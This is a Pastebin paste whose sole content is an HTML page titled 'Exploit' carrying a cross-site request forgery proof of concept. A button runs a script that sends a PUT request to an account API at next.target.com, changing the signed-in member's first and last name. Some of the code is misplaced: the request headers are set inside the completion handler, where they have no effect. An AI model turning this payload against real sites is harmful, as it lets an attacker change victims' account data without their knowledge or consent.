Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <!DOCTYPE html>
- <html>
- <head>
- <title>Exploit</title>
- <meta charset="utf-8">
- </head>
- <body>
- <button type='button' onclick='csrf()'>CSRF</button>
- <script>
- function csrf(){
- var xh = new XMLHttpRequest();
- xh.onreadystatechange = function(){
- if (this.readyState == 4 && this.status == 200) {
- xh.setRequestHeader("User-Agent", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0");
- xh.setRequestHeader("Accept", "application/json, text/plain, */*");
- xh.setRequestHeader("Referer", "https://next.target.com/account");
- xh.setRequestHeader("Content-Type", "application/json;charset=utf-8");
- }
- };
- xh.open("PUT", "https://next.target.com/proxy/api/members/name", true);
- var data = {experienceId:"21",firstName:"csed",lastName:"baset"};
- xh.send(JSON.stringify(data));
- }
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement